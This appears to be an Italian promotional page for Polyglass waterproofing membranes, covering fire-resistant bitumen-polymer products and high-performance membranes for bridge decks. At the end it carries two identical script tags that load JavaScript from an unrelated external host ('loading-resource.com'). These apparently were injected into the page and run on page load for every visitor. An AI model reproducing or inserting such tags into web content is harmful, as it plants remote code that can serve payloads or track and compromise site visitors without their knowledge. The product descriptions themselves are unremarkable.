Alle principali fiere di settore Polyglass sarà presente con la sua gamma di soluzioni, in grado di soddisfare qualsiasi esigenza di impermeabilizzazione con prodotti sia bituminosi che sintetici.
Alle tradizionali membrane bitume polimero distillato, Polyglass affianca le membrane autoadesive ADESO®, che non necessitano l’uso di fiamma in applicazione, le innovative membrane ultra-leggere REOXTHENE® dalle performance superiori, i manti sintetici MAPEPLAN®, la linea PRODOTTI SPECIALI, complementari all’impermeabilizzazione ed i sistemi isolanti POLYSOL.
POLYGLASS presenta anche una nuova famiglia di membrane bituminose aventi la certificazione di reazione al fuoco BROOF(t2) ed una famiglia di membrane HP (High Performance) specificamente studiate per l’impermeabilizzazione di ponti e viadotti.
STOP AL FUOCO
Polyglass del gruppo Mapei presenta al mercato una completa gamma di membrane bitume distillato polimero resistenti al fuoco, in particolare al fuoco esterno secondo la norma UNI EN 13501-5.
La gamma comprende tre prodotti:
- un prodotto elastomerico per applicazione a caldo, mediante sfiammatura a gas propano, ELASTOFLEX S6 AF (flessibilità a freddo -20 ° C);
- un prodotto elastoplastomerico FUTURA RS4 AF (flessibilità a freddo -25 °C).
I prodotti, ambedue con eccellenti caratteristiche tecniche, sono disponibili sia nella versione mono-strato che multistrato auto-protette con scaglie di ardesia naturale.
- una membrana distillato polimero per applicazioni a freddo della rinomata gamma ADESO®, ELASTOFLEX SA P AF (a base elastomerica SBS, in questo caso disponibile sia nella versione liscia che in quella auto-protetta con ardesia).
Questi prodotti oltre a soddisfare i severi requisiti della normativa vigente sono altresì conformi ai recenti requisiti tecnici della “GUIDA PER L’INSTALLAZIONE DEGLI IMPIANTI FOTOVOLTAICI “ edizione anno 2012 edita dal Dipartimento dei Vigili del Fuoco.
PER GRANDI OPERE SERVE UNA GRANDE TECNOLOGIA
È noto da tempo che la protezione contro acqua ed umidità è forse il requisito più importante per la salvaguardia e durata dei manufatti in edilizia.
Nel caso specifico di ponti e viadotti questa esigenza diventa ancora più importante vista la complessità tecnica di interventi riparatori a posteriori.
I sali antighiaccio, l’acqua, le forti sollecitazioni meccaniche impongono per l’impermeabilizzazione degli impalcati stradali membrane bitume distillato polimero ad altissime prestazioni aventi armature ad elevata grammatura e mescole resistenti alla posa del binder stradale
Polyglass presenta al mercato tre differenti prodotti:
- una membrana elastoplastomerica APP nelle versioni lisce di 4 o 5 mm denominata POLYBOND HP.
- due nuovi prodotti con tecnologia REOXTHENE®, una rivoluzione tecnologica che permetta la produzione di membrane bitume distillato polimero di eccezionale leggerezza a parità di spessore, che utilizza un innovativo compound con brevetto 2264094 e 2264092, che aumenta il contenuto di miscela bitume polimero (la massa impermeabilizzante) dei prodotti fino al 30 % e allo stesso tempo ne permette la drastica diminuzione del peso fino al 40%:
- EVOLIGHT HP disponibile nelle versioni 3 e 4 mm;
- POLYFLEX LIGHT HP disponibile nelle versioni 4 e 5 mm.
<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>